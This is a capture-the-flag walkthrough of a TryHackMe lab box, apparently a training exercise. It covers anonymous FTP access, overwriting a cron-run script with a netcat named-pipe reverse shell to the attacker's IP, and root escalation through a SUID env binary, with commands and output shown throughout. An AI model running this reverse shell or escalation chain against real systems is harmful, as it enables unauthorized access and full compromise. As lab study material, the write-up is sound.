5 minute read

Anonymous is a medium rated room in tryhackme which has a anonymous login enabled in ftp which has a folder called scripts in which anyone can write a file. It also has a script which is continuously being executed probably as a cron job. So we overwrite this script to get a reverse shell. Inside the box, we exploited the binary env which had SUID bit enabled to get a root shell.

Room Link : https://tryhackme.com/room/anonymous

Port Scan

local@local:~/Documents/tryhackme/anonymous$ nmap -oN initial 10.10.144.74
Nmap scan report for 10.10.144.74
Host is up (0.42s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

# Nmap done at Sat Sep 19 19:56:01 2020 -- 1 IP address (1 host up) scanned in 55.17 seconds

Trying Anonymous login on ftp

ftp 10.10.144.74       
Connected to 10.10.144.74.                
220 NamelessOne's FTP Server!                                                           
Name (10.10.144.74:local): anonymous   
331 Please specify the password.          
Password:                                 
230 Login successful.                     
Remote system type is UNIX.               
Using binary mode to transfer files.                                                    
ftp> dir -a                                                                             
200 PORT command successful. Consider using PASV.              
150 Here comes the directory listing.                                                                                                                                           
drwxr-xr-x    3 65534    65534        4096 May 13 19:49 .        
drwxr-xr-x    3 65534    65534        4096 May 13 19:49 ..                              
drwxrwxrwx    2 111      113          4096 Jun 04 19:26 scripts                         
226 Directory send OK.                                   

And the anonymous login is enabled and we can see there is directory called scripts with permissions 777, which means anyone can read, write and execute files on the scripts folder.

Checking the content of scripts folder

ftp> dir -a                                                                             
200 PORT command successful. Consider using PASV.                                       
150 Here comes the directory listing.                                                   
drwxrwxrwx    2 111      113          4096 Jun 04 19:26 .                               
drwxr-xr-x    3 65534    65534        4096 May 13 19:49 ..                              
-rwxr-xrwx    1 1000     1000          314 Jun 04 19:24 clean.sh                        
-rw-rw-r--    1 1000     1000          946 Sep 19 13:59 removed_files.log                                                                                                       
-rw-r--r--    1 1000     1000           68 May 12 03:50 to_do.txt
226 Directory send OK.                                                                  

Lets download all the files to our local box.

ftp> get clean.sh                                                                                                                                                               
local: clean.sh remote: clean.sh                                                        
200 PORT command successful. Consider using PASV.                                       
150 Opening BINARY mode data connection for clean.sh (314 bytes).                                                                                                               
226 Transfer complete.                                                                                                                                                          
314 bytes received in 0.00 secs (1.6823 MB/s)                     
ftp> get to_do.txt                                                                      
local: to_do.txt remote: to_do.txt                                                      
200 PORT command successful. Consider using PASV.                                       
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (288.7228 kB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for removed_files.log (946 bytes).
226 Transfer complete.
946 bytes received in 0.00 secs (5.0401 MB/s)

Contents of to_do.txt

local@local:~/Documents/tryhackme/anonymous/ftp$ cat to_do.txt 
I really need to disable the anonymous login...it's really not safe

We exploited the anonymous login vulnerability to get into the system.

Content of clean.sh

local@local:~/Documents/tryhackme/anonymous/ftp$ cat clean.sh 
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

Looks like some cleaning script.

Contents of removed_files.log

local@local:~/Documents/tryhackme/anonymous/ftp$ cat removed_files.log 
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete

The interesting thing about the content of the file is that this is generated from the clean.sh and looking at the output the script is executed multiple times. This means that the script clean.sh might be running continously as cronjob. As we have write permission on that folder, we can write our own clean.sh with reverse shell.

Content of new clean.sh

local@local:~/Documents/tryhackme/anonymous$ cat clean.sh 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.3.202 9001 >/tmp/f

Listening on port 9001 on local box

local@local:~/Documents/tryhackme/anonymous$ nc -nvlp 9001                                                                                                                
Listening on [0.0.0.0] (family 2, port 9001)                                                                                                                                    
Listening on 0.0.0.0 9001  

Uploading the new clean.sh

ftp> put clean.sh
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
574 bytes sent in 0.00 secs (6.5168 MB/s)

After some time we got a shell.

local@local:~/Documents/tryhackme/anonymous$ nc -nvlp 9001                                                                                                                
Listening on [0.0.0.0] (family 2, port 9001)                                            
Listening on 0.0.0.0 9001                                                               
Connection received on 10.10.144.74 47542                                               
/bin/sh: 0: can't access tty; job control turned off                              
$

Getting a proper shell

$ python -c "import pty;pty.spawn('/bin/bash')"                                  
namelessone@anonymous:~$

Hit CTRL + z to background the current process and type

local@local:~/Documents/tryhackme/anonymous$ stty raw -echo

And type fg and hit enter twice and export TERM variable on the reverse shell.

namelessone@anonymous:~$ export TERM=xterm 

Now we got a proper shell with autocompletion.

Reading User flag

namelessone@anonymous:~$ ls                                                                                                                                                     
pics  user.txt                                                                          
namelessone@anonymous:~$ cat user.txt                                                   
90d6f************************4740

Privilege Escalation

Before running scripts like linpeas and LinEnum, I like to do basic Enumeration.

Checking sudo privileges

namelessone@anonymous:~$ sudo -l                                                                                                                                     [1588/2782]
[sudo] password for namelessone:                                                                                                                                                
Sorry, try again.                                                                                                                                                               
[sudo] password for namelessone:                                                        
sudo: 1 incorrect password attempt  

Checking for SUID binaries

namelessone@anonymous:~$ find / -type f -perm -4000 2>/dev/null | grep -i env
/usr/bin/env

As soon as I saw env with SUID bit activated, I went to gtfobins to check whether this can be used to escalate my privilege to root and turns out I can. I havenot listed all the binaries with SUID bit enabled here.

Getting root shell

namelessone@anonymous:~$ which env
/usr/bin/env
namelessone@anonymous:~$ /usr/bin/env /bin/sh -p
# id
id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

Reading root flag

# cd /root
# cat root.txt
4d93************************f363